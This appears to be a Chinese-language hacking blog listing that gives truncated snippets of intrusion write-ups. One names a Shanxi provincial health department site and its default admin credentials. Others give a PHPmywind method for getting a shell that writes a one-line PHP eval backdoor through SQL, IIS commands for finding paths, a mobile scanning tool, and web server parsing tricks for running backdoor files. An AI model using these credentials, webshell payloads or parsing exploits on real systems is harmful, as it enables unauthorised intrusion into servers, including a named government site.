-
山西省卫生厅:从一个弱口令到整个服务器
一个弱口令,导致服务器悲剧。http://www.sxswst.gov.cn/luntan/管理员账号密码默认admin admin888dvbbs8.2.0后台get shell方法百度之ashx写aspx一句话连接得到asp或者aspx...
-
Iphone渗透工具 WebCruiser
WebCruiser For Ios:一款方便的移动渗透工具WebCruiser可检测以下漏洞:* GET SQL Injection(Int, String, Search)* POST SQL Injection(Int, String...
-
iis7.0命令行下列网站的物理目录
cmd下执行: cd %systemroot%\system32\Inetsrv\ 如果您运行的是64 位Windows,请从%windir%\system32\inetsrv 目录而不是%windir%\syswow64\inetsrv...
-
PHPmywind 后台拿shell
网上好像有好多的教程的 用数据库执行Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');sel...
-
IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结
[+]IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg...
